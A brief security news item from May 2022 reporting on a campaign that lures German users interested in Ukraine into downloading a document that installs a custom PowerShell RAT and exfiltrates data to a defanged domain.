Security News > 2022 > May > Ukraine supporters in Germany targeted with PowerShell RAT malware
An unknown threat actor is targeting German users interested in the Ukraine crisis, infecting them with a custom PowerShell RAT and stealing their data.
These sites offer malicious documents that install a custom RAT that supports remote command execution and file operations.
Visitors of the site will find a file called "2022-Q2-Bedrohungslage-Ukraine," promising information about the situation in Ukraine and offered for free download. The corresponding section on the site claims that the document is constantly updated with new information, so users are urged to get a fresh copy every day.
In the background the file triggers PowerShell that runs a Base64 deobfuscator leading to fetching and executing a malicious script from the fake site.
Txt file form and a.cmd file that helps execute it through PowerShell.
PowerShell RAT. The custom PowerShell RAT that hides in "Status.txt" begins its malicious operation by collecting basic system information and assigning a unique client ID. This information and anything else stolen from the host computers is exfiltrated to a German domain, "Kleinm[.]de".